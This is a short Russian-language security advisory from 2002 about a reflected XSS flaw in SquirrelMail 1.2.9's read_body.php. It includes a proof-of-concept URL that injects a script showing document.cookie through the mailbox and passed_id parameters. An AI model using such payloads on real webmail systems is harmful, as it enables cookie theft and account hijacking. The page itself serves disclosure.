Межсайтовый скриптинг в SquirrelMail

Дата публикации:
09.12.2002
Всего просмотров:
737
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: SquirrelMail - webmail программа для Linux, и Unix систем.

Сценарий read_body.php не в состоянии отфильтровать код сценария в параметрах `mailbox' и `passed_id'. Уязвимость может использоваться для перехвата опознавательной информации, хранящейся в куки.

http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0
Уязвимость обнаружена SquirrelMail 1.2.9

Уязвимость обнаружил F0KP из HACKRU Team (f0kp.iplus.ru)

Ссылки: SquirrelMail v1.2.9 XSS bugs

или введите имя

CAPTCHA